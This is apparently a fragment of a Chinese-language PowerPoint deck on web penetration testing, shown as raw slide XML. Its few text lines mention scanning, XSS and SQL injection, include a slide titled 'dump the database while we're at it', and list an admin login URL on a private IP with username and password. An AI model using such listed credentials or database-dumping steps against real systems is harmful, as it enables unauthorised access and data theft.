                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="427" grpId="2"/>
    </p:bldLst>
  </p:timing>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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839786" y="1830386"/>
            <a:ext cx="11099803" cy="2159002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>写在最后</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Shape 430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839786" y="4875212"/>
            <a:ext cx="11099803"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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>要完成一次完整的web渗透，往往可能需要多种技术一起使用，例如可以从一开始的扫描，到渗透阶段的xss，sqlinjection等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Shape 431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4215754" y="7723187"/>
            <a:ext cx="374779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j-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Are you ready ？</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29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42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30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43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431"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17"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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="430" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="429"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731043" y="985836"/>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Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>顺手脱个库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="image5.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3240951" y="1879026"/>
            <a:ext cx="6522897" cy="6376548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1693391" y="8610599"/>
            <a:ext cx="91711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2100">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>后台 http://192.168.166.208:808/ligon.aspx     账号admin 密码 123456789 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="image4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5338898" y="820737"/>
            <a:ext cx="1017589" cy="3508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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="10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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="2500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="67"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="2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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="67" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="66"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9BBB59"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8064A2"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4BACC6"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F79646"/>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9BBB59"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8064A2"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4BACC6"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F79646"/>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